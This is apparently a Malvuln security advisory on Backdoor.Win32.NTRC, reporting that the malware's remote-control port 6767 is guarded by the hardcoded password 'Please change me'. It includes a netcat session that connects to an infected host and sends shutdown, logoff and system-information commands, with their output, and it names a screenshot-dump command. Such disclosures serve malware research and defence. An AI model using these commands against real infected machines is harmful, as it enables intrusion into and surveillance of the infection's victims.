Backdoor.Win32.NTRC MVID-2022-0646 Hardcoded Credential

Backdoor.Win32.NTRC malware suffers from a hardcoded credential vulnerability.

SHA-256 | a322e5735d0deb5c868f091706d37757fb129052cbe2bf666954811ee4775878

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source:
Contact: [email protected]

Threat: Backdoor.Win32.NTRC
Vulnerability: Weak Hardcoded Credentials
Family: NTRC
Type: PE32
MD5: 273fd3f33279cc9c0378a49cf63d7a06
Vuln ID: MVID-2022-0646
Disclosure: 10/02/2022
Description: The malware listens on TCP port 6767. Authentication is required, however the password "Please change me" is weak and hardcoded in cleartext at offset 0045E520. Commands get executed by sending the password delimited by a semicolon ";" E.g. Please change me;SystemInfo;. The command SendScreen dumps screenshot as .BMF file, to get the next part of the file issue SendScreenNextPart.

0045E520 dd 16 ; Len
0045E520 db 'Please change me',0 ; Text
0045E539 align 4

C:\>nc64.exe x.x.x.x 6767

Please change me;Shutdown;
Error;Can not shutdown the server. Please contact the author at [email protected]
Please change me;Logoff;

Please change me;SystemInfo;
SystemInfo;6.2;9200;Windows NT;Victim;DESKTOP-2C3IQHO;C:\WINDOWS;1;Intel;Intel Pentium

Please change me;SystemInfo2;
;;;;;0;0;0;0;0;;;;9 Mb;1480.29 Mb;27 %;2687.49 Mb;1607.21 Mb;40 %;2047.88 Mb;1893.88 Mb;D

Please change me;Logoff;

